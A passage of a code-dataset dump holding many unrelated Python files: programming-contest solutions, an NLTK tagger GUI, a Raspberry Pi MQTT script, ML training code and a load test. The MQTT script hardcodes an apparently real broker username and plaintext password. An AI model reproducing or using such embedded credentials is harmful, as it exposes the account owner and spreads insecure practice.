i and zeros > k:\n                if not nums[l]:\n                    zeros -= 1\n                l += 1\n\n            # note the window length is i - l + 1\n            # e.g. for indices [1, 2] the length is 2 - 1 + 1 = 2\n            res = max(i - l + 1, res)\n        \n        return res","repo_name":"latree/leetcode","sub_path":"Array/max_consecutive_ones_iii.py","file_name":"max_consecutive_ones_iii.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23424524341","text":"#!/usr/bin/env python3\n\ndef meilleur(C, F, X):\n\tR = 2.0\n\tderniere_ferme = 0.0\n\tmeilleur = X / R\n\n\twhile True:\n\t\tderniere_ferme += C / R\n\t\tR += F\n\t\tcandidat = derniere_ferme + X / R\n\n\t\tif candidat < meilleur:\n\t\t\tmeilleur = candidat\n\n\t\telse:\n\t\t\tbreak\n\n\treturn meilleur\n\nT = int(input())\n\nfor i in range(T):\n\tC, F, X = map(float, input().split())\n\tprint(\"Case #{}: {}\".format(i + 1, meilleur(C, F, X)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2315.py","file_name":"2315.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36068592208","text":"import nltk\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tokenize import PunktSentenceTokenizer\nfrom nltk.corpus import wordnet as wn\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.data import load\n\nimport re\n\nfrom tkinter import *\n\nroot = Tk()\n\ntxt = StringVar()\ntxt.set(\"This all happened because of you, scientists!\")\nres = StringVar()\n\nlemmatizer = WordNetLemmatizer()\ntag_dict = {\n    \"JJ\": wn.ADJ,\n    \"JJR\": wn.ADJ,\n    \"JJS\": wn.ADJ,\n    \"NN\": wn.NOUN,\n    \"NNP\": wn.NOUN,\n    \"NNS\": wn.NOUN,\n    \"NNPS\": wn.NOUN,\n    \"VB\": wn.VERB,\n    \"VBN\": wn.VERB,\n    \"VBG\": wn.VERB,\n    \"VBZ\": wn.VERB,\n    \"VBP\": wn.VERB,\n    \"VBD\": wn.VERB,\n    \"RB\": wn.ADV,\n    \"RBR\": wn.ADV,\n    \"RBS\": wn.ADV,\n    }\n\ndef pos_tag_sentence(sent):\n    postgs = nltk.pos_tag(nltk.word_tokenize(sent))\n    rtgs = list()\n    i = 0\n    pos = 1\n    while i < len(postgs):\n        pt = postgs[i]\n        if re.search(r\"[A-Za-z]+\", pt[0]) != None:\n            lemma = str()\n            if pt[1] in tag_dict:\n                lemma = lemmatizer.lemmatize(pt[0], pos=tag_dict.get(pt[1]))\n            
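# Why the POS hint matters -- WordNet lemmatizes through the given part of
# speech, e.g.:
#   lemmatizer.lemmatize("better", pos=wn.ADJ)   -> "good"
#   lemmatizer.lemmatize("running", pos=wn.VERB) -> "run"
# The fallback branch below omits pos, so unmapped tags are treated as nouns.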
else:\n lemma = lemmatizer.lemmatize(pt[0])\n rtgs.append([lemma.upper(), pt[1], pos])\n pos += 1\n i += 1\n return rtgs\n\ntagdict = load('help/tagsets/upenn_tagset.pickle')\n\ndef tag_text():\n sentences = nltk.sent_tokenize(txt.get())\n out = str()\n for sent in sentences:\n out += \"--- Sentence: {}\\n\".format(sent)\n tsent = pos_tag_sentence(sent)\n i = 0\n tsent = sorted(tsent, key = lambda s: s[0])\n while i < len(tsent):\n pt = tsent[i]\n out += \"{} -- {}({}). Position: {}\\n\".format(pt[0], pt[1], tagdict[pt[1]][0], pt[2])\n i += 1\n res.set(out)\n\nhelpmsg = str()\nfor key in tagdict.keys():\n helpmsg += \"* {} -- {}\\nExamples: {}\\n\".format(key, tagdict[key][0], tagdict[key][1])\n\ndef help_window():\n children = Toplevel(root)\n children.title('Help')\n\n\n text = Text(children, height=20, width=100)\n scroll = Scrollbar(children)\n scroll.pack(side=RIGHT, fill=Y)\n text.pack(side=LEFT, fill=Y)\n scroll.config(command=text.yview)\n text.config(yscrollcommand=scroll.set)\n text.insert(END, helpmsg)\n\nroot.title(\"Sentence analyzer\")\nroot.geometry(\"700x600\")\n\nentry = Entry(width=70, textvariable=txt)\nentry.place(relx=.5, rely=.1, anchor=\"c\")\n\nbutton = Button(text=\"Tag text\", command=tag_text)\nbutton.place(relx=.5, rely=.2, anchor=\"c\")\n\nresultlabel = Label(textvariable=res, justify=LEFT)\nresultlabel.place(relx=.5, rely=.3, anchor=\"n\")\n\nhelp = Button(text=\"Help\", command=lambda: help_window())\nhelp.place(relx=.5, rely=.8, anchor=\"c\")\n\nroot.mainloop()\n","repo_name":"PlagaMedicum/pos-glossary-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13148936794","text":"import paho.mqtt.client as mqtt \nimport time\nimport RPi.GPIO as GPIO\nimport datetime\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18,GPIO.OUT)\nGPIO.setup(17,GPIO.OUT)\nGPIO.setup(19,GPIO.IN)\nGPIO.setup(20,GPIO.IN)\n\ndef on_message(client,obj,msg):\n\tmensaje=(msg.payload.decode(\"utf-8\"))\n\tif mensaje==\"s1\":\n\t\tprint(\"historial1\")\n\t\tf=open(\"sensor1\",\"r\")\n\t\tmen1= f.read()\n\t\tmqttc.publish(\"mdpilatuna.fie@unach.edu.ec/WEB\", men1)\n\telif mensaje==\"s2\":\n\t\tprint(\"historial2\")\n\t\tg=open(\"sensor2\",\"r\")\n\t\tmen2= g.read()\n\t\tmqttc.publish(\"mdpilatuna.fie@unach.edu.ec/WEB\", men2)\n\nmqttc = mqtt.Client() \nmqttc.on_message = on_message \nmqttc.username_pw_set(\"mdpilatuna.fie@unach.edu.ec\",\"quitociudadhermosa\") \nmqttc.connect(\"maqiatto.com\", 1883) \nmqttc.subscribe(\"mdpilatuna.fie@unach.edu.ec/RASP\", 0)\nrc=0\nprint(\"inicio...\")\ni = 0\nwhile rc == 0:\n\thora=datetime.datetime.now().strftime('%H:%M:%S')\n\ttime.sleep(3)\n\trc = mqttc.loop()\n\tif GPIO.input(19):\n\t\testado1=\"Encendido\"\n\t\tGPIO.output(17,True)\n\telse: \n\t\testado1=\"Apagado\"\n\t\tGPIO.output(17,False)\n\tif GPIO.input(20):\n\t\testado2=\"Encendido\"\n\t\tGPIO.output(18,True)\n\telse: \n\t\testado2=\"Apagado\"\n\t\tGPIO.output(18,False)\n\tf=open(\"sensor1\",\"w\")\n\tf.write(\"Sensor1 \"+estado1+\"a las\" + hora)\n\tf.close()\n\tg=open(\"sensor2\",\"w\")\n\tg.write(\"Sensor2 \"+estado2+\"a las\" + hora)\n\tg.close()","repo_name":"mauricio2020dani/examen","sub_path":"templates/new 1.py","file_name":"new 1.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42815499505","text":"from locust import HttpUser, task, 
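# Notes on the load profile defined below: between(3, 5) makes each simulated
# user pause 3-5 seconds between tasks, and the integers given to @task are
# relative weights, so prediction_test fires roughly twice as often as
# connectivity_test. The relative "/predict" URL resolves against `host`.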
between\n\nclass MyUser(HttpUser):\n wait_time = between(3, 5)\n host = \"https://localhost:8089/\"\n\n @task(1)\n def connectivity_test(self):\n self.client.get(\"https://azureflaskprediction.azurewebsites.net/predict\")\n\n @task(2)\n def prediction_test(self):\n payload = {\n \"CHAS\": {\"0\": 0},\n \"RM\": {\"0\": 6.575},\n \"TAX\": {\"0\": 296.0},\n \"PTRATIO\": {\"0\": 15.3},\n \"B\": {\"0\": 396.9},\n \"LSTAT\": {\"0\": 4.98}\n }\n response = self.client.post(\n \"/predict\", json=payload, headers={'Content-Type': 'application/json'})","repo_name":"selimkayali/flask-ml-service","sub_path":"locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25521212568","text":"import geopandas\nimport folium\nimport folium.plugins as plugins\n\ngeo_path = '/tmp/regional-soils-a-xrf.geojson'\nrows = []\npopups = []\n\ndef latlong(row):\n rows.append([row.geometry.y, row.geometry.x])\n popups.append(\"Fe2 O3: %lf\" % row.Fe2O3)\n\ngdf = geopandas.GeoDataFrame.from_file(geo_path).to_crs(epsg='4326')\ngdf.apply(latlong, axis=1)\n\nice_map = folium.Map(location=[55, -6],\n tiles='cartodbpositron', zoom_start=10)\nice_map.add_children(plugins.MarkerCluster(locations=rows, popups=popups))\nice_map.save('soils.html')\n","repo_name":"flaxandteal/python-course","sub_path":"011-geography/python/gpa.py","file_name":"gpa.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"70264259076","text":"import logging\nimport os\nfrom pathlib import Path\n\nfrom codetiming import Timer\nfrom knockknock import slack_sender\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\nfrom tqdm.contrib.logging import logging_redirect_tqdm\nimport typer\nimport yaml\n\nfrom ml_downscaling_emulator.unet import unet\nfrom mlde_utils.training import log_epoch, track_run, save_checkpoint\nfrom mlde_utils.torch import get_dataloader\n\nUNET_ARCHNAME = \"u-net\"\nSIMPLE_CONV_ARCHNAME = \"simple-conv\"\nEXPERIMENT_NAME = os.getenv(\"WANDB_EXPERIMENT_NAME\")\nTAGS = {\n UNET_ARCHNAME: [\"baseline\", UNET_ARCHNAME],\n SIMPLE_CONV_ARCHNAME: [\"baseline\", SIMPLE_CONV_ARCHNAME, \"debug\"],\n}\n\napp = typer.Typer()\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(levelname)s - %(filename)s - %(asctime)s - %(message)s\",\n)\nlogger = logging.getLogger()\nlogger.setLevel(\"INFO\")\n\n\n@app.command()\n@Timer(name=\"train\", text=\"{name}: {minutes:.1f} minutes\", logger=logging.info)\n@slack_sender(webhook_url=os.getenv(\"KK_SLACK_WH_URL\"), channel=\"general\")\ndef main(\n workdir: Path,\n dataset: str = typer.Option(...),\n epochs: int = 200,\n learning_rate: float = 2e-4,\n batch_size: int = 64,\n snapshot_freq: int = 25,\n input_transform_key: str = \"v1\",\n target_transform_key: str = \"v1\",\n):\n\n run_config = dict(\n dataset=dataset,\n input_transform_key=input_transform_key,\n target_transform_key=target_transform_key,\n batch_size=batch_size,\n epochs=epochs,\n architecture=\"u-net\",\n loss=\"MSELoss\",\n optimizer=\"Adam\",\n device=(\"cuda\" if torch.cuda.is_available() else \"cpu\"),\n )\n\n run_name = workdir.name\n\n os.makedirs(workdir, exist_ok=True)\n\n gfile_stream = open(os.path.join(workdir, \"stdout.txt\"), \"w\")\n handler = logging.StreamHandler(gfile_stream)\n formatter = logging.Formatter(\n \"%(levelname)s - %(filename)s - %(asctime)s - %(message)s\"\n )\n 
handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n # Create transform saving directory\n transform_dir = os.path.join(workdir, \"transforms\")\n os.makedirs(transform_dir, exist_ok=True)\n\n # Create directories for experimental logs\n sample_dir = os.path.join(workdir, \"samples\")\n os.makedirs(sample_dir, exist_ok=True)\n\n tb_dir = os.path.join(workdir, \"tensorboard\")\n os.makedirs(tb_dir, exist_ok=True)\n\n logging.info(f\"Starting {os.path.basename(__file__)}\")\n\n # Create checkpoints directory\n checkpoint_dir = os.path.join(workdir, \"checkpoints\")\n os.makedirs(checkpoint_dir, exist_ok=True)\n # Intermediate checkpoints to resume training after pre-emption in cloud environments\n checkpoint_meta_dir = os.path.join(workdir, \"checkpoints-meta\", \"checkpoint.pth\")\n os.makedirs(os.path.dirname(checkpoint_meta_dir), exist_ok=True)\n\n device = torch.device(run_config[\"device\"])\n logging.info(f\"Using device {device}\")\n\n # Build dataloaders\n train_dl, _, _ = get_dataloader(\n dataset,\n dataset,\n input_transform_key,\n target_transform_key,\n transform_dir,\n batch_size=batch_size,\n split=\"train\",\n evaluation=False,\n )\n val_dl, _, _ = get_dataloader(\n dataset,\n dataset,\n input_transform_key,\n target_transform_key,\n transform_dir,\n batch_size=batch_size,\n split=\"val\",\n evaluation=False,\n )\n\n # Setup model, loss and optimiser\n num_predictors, _, _ = train_dl.dataset[0][0].shape\n model = unet.UNet(num_predictors, 1).to(device=device)\n if run_config[\"loss\"] == \"MSELoss\":\n criterion = torch.nn.MSELoss().to(device)\n else:\n raise NotImplementedError(f'Loss {run_config[\"loss\"]} not supported yet!')\n\n if run_config[\"optimizer\"] == \"Adam\":\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n else:\n raise NotImplementedError(\n f'Optimizer {run_config[\"optimizer\"]} not supported yet!'\n )\n\n state = dict(optimizer=optimizer, model=model, step=0, epoch=0)\n\n initial_epoch = int(state[\"epoch\"])\n step = state[\"step\"]\n\n def loss_fn(model, batch, cond):\n return criterion(model(cond), batch)\n\n def optimize_fn(optimizer, params, step, lr, warmup=5000, grad_clip=1.0):\n \"\"\"Optimizes with warmup and gradient clipping (disabled if negative).\"\"\"\n if warmup > 0:\n for g in optimizer.param_groups:\n g[\"lr\"] = lr * np.minimum(step / warmup, 1.0)\n if grad_clip >= 0:\n torch.nn.utils.clip_grad_norm_(params, max_norm=grad_clip)\n optimizer.step()\n\n # Compute validation loss\n def eval_step_fn(state, batch, cond):\n \"\"\"Running one step of training or evaluation.\n\n This function will undergo `jax.lax.scan` so that multiple steps can be pmapped and jit-compiled together\n for faster execution.\n\n Args:\n state: A dictionary of training information, containing the score model, optimizer,\n EMA status, and number of optimization steps.\n batch: A mini-batch of training/evaluation data to model.\n cond: A mini-batch of conditioning inputs.\n\n Returns:\n loss: The average loss value of this state.\n \"\"\"\n model = state[\"model\"]\n with torch.no_grad():\n loss = loss_fn(model, batch, cond)\n\n return loss\n\n def train_step_fn(state, batch, cond):\n \"\"\"Running one step of training or evaluation.\n\n This function will undergo `jax.lax.scan` so that multiple steps can be pmapped and jit-compiled together\n for faster execution.\n\n Args:\n state: A dictionary of training information, containing the score model, optimizer,\n EMA status, and number of optimization steps.\n batch: A mini-batch of 
training/evaluation data to model.\n cond: A mini-batch of conditioning inputs.\n\n Returns:\n loss: The average loss value of this state.\n \"\"\"\n model = state[\"model\"]\n optimizer = state[\"optimizer\"]\n optimizer.zero_grad()\n loss = loss_fn(model, batch, cond)\n loss.backward()\n optimize_fn(optimizer, model.parameters(), step=state[\"step\"], lr=learning_rate)\n state[\"step\"] += 1\n\n return loss\n\n # save the config\n config_path = os.path.join(workdir, \"config.yml\")\n with open(config_path, \"w\") as f:\n yaml.dump(run_config, f)\n\n with track_run(\n EXPERIMENT_NAME, run_name, run_config, TAGS[run_config[\"architecture\"]], tb_dir\n ) as (wandb_run, tb_writer):\n # Fit model\n wandb_run.watch(model, criterion=criterion, log_freq=100)\n\n logging.info(\"Starting training loop at epoch %d.\" % (initial_epoch,))\n\n for epoch in range(initial_epoch, epochs + 1):\n # Update model based on training data\n model.train()\n\n train_set_loss = 0.0\n with logging_redirect_tqdm():\n with tqdm(\n total=len(train_dl.dataset),\n desc=f\"Epoch {epoch}\",\n unit=\" timesteps\",\n ) as pbar:\n for (cond_batch, x_batch) in train_dl:\n cond_batch = cond_batch.to(device)\n x_batch = x_batch.to(device)\n ###################\n # CURRENT VERSION #\n ###################\n # # Compute prediction and loss\n # outputs_tensor = model(cond_batch)\n # train_batch_loss = criterion(outputs_tensor, x_batch)\n # train_set_loss += train_batch_loss.item()\n\n # # Backpropagation\n # optimizer.zero_grad()\n # train_batch_loss.backward()\n # optimizer.step()\n\n #####################\n # SCORE_SDE VERSION #\n #####################\n train_batch_loss = train_step_fn(state, x_batch, cond_batch)\n train_set_loss += train_batch_loss.item()\n\n #######\n # END #\n #######\n\n # Log progress so far on epoch\n pbar.update(cond_batch.shape[0])\n\n step += 1\n train_set_loss = train_set_loss / len(train_dl)\n\n model.eval()\n val_set_loss = 0.0\n for val_cond_batch, val_x_batch in val_dl:\n # eval_cond_batch, eval_x_batch = next(iter(eval_ds))\n val_x_batch = val_x_batch.to(device)\n val_cond_batch = val_cond_batch.to(device)\n # eval_batch = eval_batch.permute(0, 3, 1, 2)\n val_batch_loss = eval_step_fn(state, val_x_batch, val_cond_batch)\n\n # Progress\n val_set_loss += val_batch_loss.item()\n val_set_loss = val_set_loss / len(val_dl)\n\n epoch_metrics = {\"train/loss\": train_set_loss, \"val/loss\": val_set_loss}\n log_epoch(epoch, epoch_metrics, wandb_run, tb_writer)\n # Checkpoint model\n if (epoch != 0 and epoch % snapshot_freq == 0) or epoch == epochs:\n checkpoint_path = os.path.join(checkpoint_dir, f\"epoch_{epoch}.pth\")\n save_checkpoint(checkpoint_path, state)\n logging.info(f\"epoch: {epoch}, checkpoint saved to {checkpoint_path}\")\n\n logging.info(f\"Finished {os.path.basename(__file__)}\")\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"henryaddison/ml-downscaling-emulation","sub_path":"bin/train-model.py","file_name":"train-model.py","file_ext":"py","file_size_in_byte":9655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23387682101","text":"import sys\n\nsys.stdin = open('B-small-0.in', 'r')\nsys.stdout = open('B-small-0.out', 'w')\n\nT = int(input())\n\n\ndef solution():\n N,M = map(int, input().split())\n a = [list(map(int, input().split())) for i in range(N)]\n ar = [[a[i][j] for i in range(N)] for j in range(M)]\n\n for i in range(N):\n for j in range(M):\n if a[i][j] == 1:\n if (a[i] != [1] * M) and (ar[j] != [1] * N):\n 
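# Feasibility rule encoded here: a 1-cell is achievable only if its
# entire row or its entire column consists of 1s; the first cell that
# violates this makes the whole grid impossible.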
return \"NO\"\n return \"YES\"\n\nfor test in range(T):\n test += 1\n print(\"Case #%03d:\" % test, end = ' ', file = sys.stderr)\n print(\"Case #%d: %s\" % (test, solution()))\n print(\"OK\", file = sys.stderr)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/1652.py","file_name":"1652.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31124076312","text":"from pathlib import Path\nfrom typing import Generic, TypeVar\n\nCURRENT_DIR = Path(__file__).absolute().parent\n\nSourceT = TypeVar(\"SourceT\")\n\n\nclass Fixtureable(Generic[SourceT]):\n fixture_name: str | None = None\n\n def __init_subclass__(cls) -> None:\n if cls.test_fixture != Fixtureable.test_fixture:\n raise ValueError(\"You are not allowed to override test_fixture method\")\n if cls._get_fixture != Fixtureable._get_fixture:\n raise ValueError(\"You are not allowed to override `_get_fixture` method\")\n if cls._run_fixture != Fixtureable._run_fixture:\n raise ValueError(\"You are not allowed to override `_run_fixture` method\")\n if cls._cleanup != Fixtureable._cleanup:\n raise ValueError(\"You are not allowed to override `_cleanup` method\")\n\n if cls.process == Fixtureable.process:\n raise NotImplementedError(\"You must override `process` method\")\n\n def _get_fixture(self):\n if self.fixture_name is None:\n raise ValueError(\"Fixture name is not defined\")\n fixture_path = CURRENT_DIR / f\"{self.fixture_name}\"\n if not fixture_path.exists():\n raise FileNotFoundError(f\"Fixture path {self.fixture_name} is not found\")\n\n source = fixture_path / \"source.tmfxture\"\n expcets = fixture_path / \"expects.tmfxture\"\n if not source.exists():\n raise FileNotFoundError(f\"Fixture source {source} is not found\")\n\n return source, expcets\n\n def _run_fixture(self):\n source, expcets = self._get_fixture()\n proc_result = self.process(source)\n return proc_result, expcets\n\n def _cleanup(self):\n fixture_path = CURRENT_DIR / f\"{self.fixture_name}\"\n if not fixture_path.exists():\n raise FileNotFoundError(f\"Fixture path {self.fixture_name} is not found\")\n\n intermediate = fixture_path / \"intermediate\"\n intermediate_fx = fixture_path / \"intermediate.tmfxture\"\n intermediate.unlink(missing_ok=True)\n intermediate_fx.unlink(missing_ok=True)\n\n def process(self, source: Path) -> SourceT:\n raise NotImplementedError\n\n def assertion_test(self, result: SourceT):\n raise NotImplementedError\n\n def test_fixture(self):\n result, expect_path = self._run_fixture()\n self._cleanup()\n if expect_path.exists():\n expect_bytes = expect_path.read_bytes()\n assert result == expect_bytes\n else:\n try:\n self.assertion_test(result)\n except NotImplementedError as ner:\n raise FileNotFoundError(\n f\"Fixture expects {expect_path} is not found, and assertion_test is not overriden\"\n ) from ner\n","repo_name":"noaione/tosho-mango","sub_path":"tests/fixtures/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40474564733","text":"from __future__ import print_function\nimport sys\nimport math\nimport lwvlib\nimport numpy as np\nfrom Bio import pairwise2\n\ndef edist(w,nearest,wv):\n \"\"\" w - words, nearest - indices into wv \"\"\"\n for nn in nearest:\n nn_word=wv.words[nn]\n if abs(len(w)-len(nn_word))>2:\n continue\n 
score=pairwise2.align.globalxx(w,wv.words[nn],score_only=True)\n err=max(len(w),len(nn_word))-score\n if err>2 or err==0:\n continue\n print(err,w.encode(\"utf-8\"),nn_word.encode(\"utf-8\"),sep=\"\\t\")\n \n\nif __name__==\"__main__\":\n batch=200\n K=10\n wv=lwvlib.load(\"/home/ginter/w2v/pb34_wf_200_v2.bin\",1500000,1500000)\n np.divide(wv.vectors, wv.norm_constants[:,None], wv.vectors)\n vectors=wv.vectors\n for i in range(0,vectors.shape[0],batch):\n sims=vectors[i:i+batch,:].dot(vectors.T)\n top_K=np.argpartition(sims,sims.shape[1]-K)[:,-K:] #words x K-1 indices of the nearest elements\n top_K_sims=sims[np.arange(batch)[:, None], top_K]\n #print(top_K_sims)\n argsorted=np.argsort(-top_K_sims)\n top_K_sorted=top_K[np.arange(batch)[:, None], argsorted]\n for w,nearest in zip(wv.words[i:i+batch],top_K_sorted):\n edist(w,nearest,wv)\n print(i,file=sys.stderr)\n sys.stdout.flush()\n sys.stderr.flush()\n\n","repo_name":"fginter/wv_spellcheck","sub_path":"sc.py","file_name":"sc.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25911787113","text":"import json\n\nfrom app.domain import BinaryResponse\nfrom app.rest.authentication import AuthenticatedHandlerBase\n\n\nclass DecisionHandlers:\n def __init__(self, decision_service, user_service):\n self.services = dict(\n decision_service=decision_service,\n user_service=user_service\n )\n self.handlers = [\n (r\"/decision/initial\", RequestInitialDecisionHandler, self.services),\n (r\"/decision/activity\", RequestActivityDecisionHandler, self.services)\n ]\n\n\nclass RequestInitialDecisionHandler(AuthenticatedHandlerBase):\n\n def initialize(self, decision_service, user_service):\n super(RequestInitialDecisionHandler, self).initialize(user_service)\n self.decision_service = decision_service\n\n def post(self):\n super(RequestInitialDecisionHandler, self).authenticate(self.request)\n if self.current_user is None:\n self.no_access()\n return\n\n user_id = self.current_user.get_user_id()\n body = json.loads(self.request.body)\n decision = self.decision_service.get_initial_decision(user_id, body)\n self.write(BinaryResponse(decision).to_dict())\n self.set_status(200)\n\n\nclass RequestActivityDecisionHandler(AuthenticatedHandlerBase):\n\n def initialize(self, decision_service, user_service):\n super(RequestActivityDecisionHandler, self).initialize(user_service)\n self.decision_service = decision_service\n\n def post(self):\n super(RequestActivityDecisionHandler, self).authenticate(self.request)\n if self.current_user is None:\n self.no_access()\n return\n\n user_id = self.current_user.get_user_id()\n body = json.loads(self.request.body)\n decision = self.decision_service.get_activity_decision(user_id, body)\n self.write(BinaryResponse(decision).to_dict())\n self.set_status(200)\n","repo_name":"samurai-technology/smart-popup","sub_path":"smart-popup-backend/app/rest/decision/DecisionHandlers.py","file_name":"DecisionHandlers.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36400602769","text":"from lookups import century_dict, decade_dict\n\ndef convert_year_to_str(year):\n # int(year) is to turn the year input (which is a string) into an int. the int() the full thing\n # is wrapped in just rounds the answer to the nearest int. eg. 1111 / 100 = 11.11 but we just want the whole int 11. 
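# (Strictly, int() truncates rather than rounds -- int(11.9) == 11 -- and for
# non-negative years floor division gets there in one step: int(year) // 100.)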
\n    century = int(int(year) / 100)\n\n    # here we are calculating how much time is left in the century to get the decade\n    remainder = int(year) - (century * 100)\n    # then we do the same int() wrap thing to get decade - using the remainder \n    decade = int(int(remainder) / 10)\n\n    # catching any error in getting str's from the dict.\n    # eg. year is 5478 and we don't have a key for 54 \n    try: \n        centuryStr = century_dict[century]\n        decadeStr = decade_dict[decade]\n        return \"%s %s\" % (centuryStr, decadeStr)\n    except:\n        print('Something went wrong converting, rip.')\n\n\nprint('Welcome to the year to century and decade converter.')\nprint('I have no idea why this would be useful - but here we are :)')\n\nyearInput = input('Please enter a year: ')\nprint(convert_year_to_str(yearInput))\n","repo_name":"mackreid/year_to_cen_dec","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20107251249","text":"import os\nimport sys\nfrom dataclasses import dataclass\n\nfrom sklearn.ensemble import (\n    AdaBoostClassifier,\n    RandomForestClassifier,\n    BaggingClassifier\n)\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom xgboost import XGBClassifier\nfrom sklearn.svm import SVC\n\n\nfrom src.exception import CustomException\nfrom src.logger import logging\n\nfrom src.utils import save_object,evaluate_models\n\n@dataclass\nclass ModelTrainerConfig:\n    trained_model_file_path=os.path.join(\"artifacts\",\"model.pkl\")\n\nclass ModelTrainer:\n    def __init__(self):\n        self.model_trainer_config=ModelTrainerConfig()\n\n\n    def initiate_model_trainer(self,train_array,test_array):\n        try:\n            logging.info(\"Split training and test input data\")\n            X_train,y_train,X_test,y_test=(\n                train_array[:,:-1],\n                train_array[:,-1],\n                test_array[:,:-1],\n                test_array[:,-1]\n            )\n            models = {\n                \"Random Forest\": RandomForestClassifier(),\n                \"Decision Tree\": DecisionTreeClassifier(),\n                \"Logistic Regression\": LogisticRegression(),\n                \"XGBClassifier\": XGBClassifier(),\n                \"AdaBoost Classifier\": AdaBoostClassifier()\n            }\n            params={\n                \"Decision Tree\": {\n                    'criterion':['gini', 'entropy', 'log_loss']\n                },\n                \"Random Forest\":{\n                    'n_estimators': [8,16,32,64,128,386]\n                },\n                \"Gradient Boosting\":{\n                    'learning_rate':[.1,.01,.05,.001],\n                    'subsample':[0.6,0.7,0.75,0.8,0.85,0.9],\n                    'n_estimators': [8,16,32,64,128,256]\n                },\n                \"Logistic Regression\":{},\n                \"XGBClassifier\":{\n                    'learning_rate':[.3,.5,.01,.1],\n                    'n_estimators': [3,10,30]\n                },\n                \"AdaBoost Classifier\":{\n                    'learning_rate':[.3,.5,.01,.1],\n                    'n_estimators': [3,10,30]\n                }\n                \n            }\n\n            model_report:dict=evaluate_models(X_train=X_train,y_train=y_train,X_test=X_test,y_test=y_test,\n                                             models=models,param=params)\n            \n            ## To get best model score from dict\n            best_model_score = max(sorted(model_report.values()))\n\n            ## To get best model name from dict\n\n            best_model_name = list(model_report.keys())[\n                list(model_report.values()).index(best_model_score)\n            ]\n            best_model = models[best_model_name]\n\n            if best_model_score<0.6:\n                raise CustomException(\"No best model found\")\n            logging.info(\"Best found model on both training and testing dataset\")\n\n            save_object(\n                file_path=self.model_trainer_config.trained_model_file_path,\n                obj=best_model\n            )\n\n            predicted=best_model.predict(X_test)\n            print(best_model_name)\n\n            accuracy = accuracy_score(y_test, predicted)\n            
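# evaluate_models comes from src.utils and is not shown in this file; a
# hedged sketch of one plausible implementation consistent with the call
# above (models dict, per-model param grids, returns {name: test score}):
#
#     from sklearn.model_selection import GridSearchCV
#
#     def evaluate_models(X_train, y_train, X_test, y_test, models, param):
#         report = {}
#         for name, model in models.items():
#             gs = GridSearchCV(model, param.get(name, {}), cv=3)
#             gs.fit(X_train, y_train)
#             model.set_params(**gs.best_params_)
#             model.fit(X_train, y_train)
#             report[name] = accuracy_score(y_test, model.predict(X_test))
#         return report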
return accuracy\n \n\n\n\n \n except Exception as e:\n raise CustomException(e,sys)","repo_name":"HARISH-VARMA-GIT/ml_project","sub_path":"src/components/model_trainer.py","file_name":"model_trainer.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18889149315","text":"# from https://github.com/lightly-ai/lightly/blob/develop/lightly/data/collate.py\n\nimport torch, glob, cv2, math, random, os\nimport numpy as np\nimport pickle as pkl\nfrom tqdm import tqdm\n\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom typing import List\n\nimport torchvision\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as F\n\nimport lightly.data as data\n\nimagenet_normalize = {'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225]}\n\ndef compute_mean_and_std(root, CHANNEL_NUM = 3, amount = 0.1, selection = False):\n\n\ttypes = ('*.png', '*.jpg')\n\ttraining_images = []\n\tfor files in types:\n\t\ttraining_images.extend(glob.glob(root + '/*/' + files))\t\n\n\tif selection:\n\t\ttraining_images = random.sample(training_images, math.ceil(len(training_images)*amount))\n\n\tpixel_num = 0\n\tchannel_sum = np.zeros(CHANNEL_NUM)\n\tchannel_sum_squared = np.zeros(CHANNEL_NUM)\n\n\tfor i in tqdm(training_images):\n\t\tim = cv2.imread(i)\n\t\tim = 